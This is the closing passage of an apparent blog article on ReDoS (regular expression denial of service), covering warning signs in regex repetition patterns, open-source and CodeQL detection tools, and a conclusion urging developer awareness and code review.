    • Alternation with overlapping

When you find a regex with repetition patterns, for example, + character is used in your regex, you should start to pay some attention to the regex as it contains repetition patterns.

Use some automation tool

There are also some automation tools that you might be able to use, for example,  rxxr2 and  ReScue are some open source tools you could use neatly. If you have your source code hosted in Github and have Github Advance Security  enabled,  you could scan your code with CodeQL and the vulnerable regex could be flagged as well though you still need to verify it manually.

Conclusion

Composing an efficient and robust regex is hard and to spot a regex vulnerable to ReDOS is not easier either. This article just attempts to explore the basic problems of ReDOS and how to identify and exploit it with the help of some tools by providing a concrete example.

As stated in the before ahead, most developers, even the security engineers  are not  really aware of the potential risks of an efficient regex. The best way to avoid the ReDOS risk caused by an inefficient regex is to inform your developers and security engineers about the danger of the ReDOS and perform a thorough code review and testing when a regex has to be used in your code.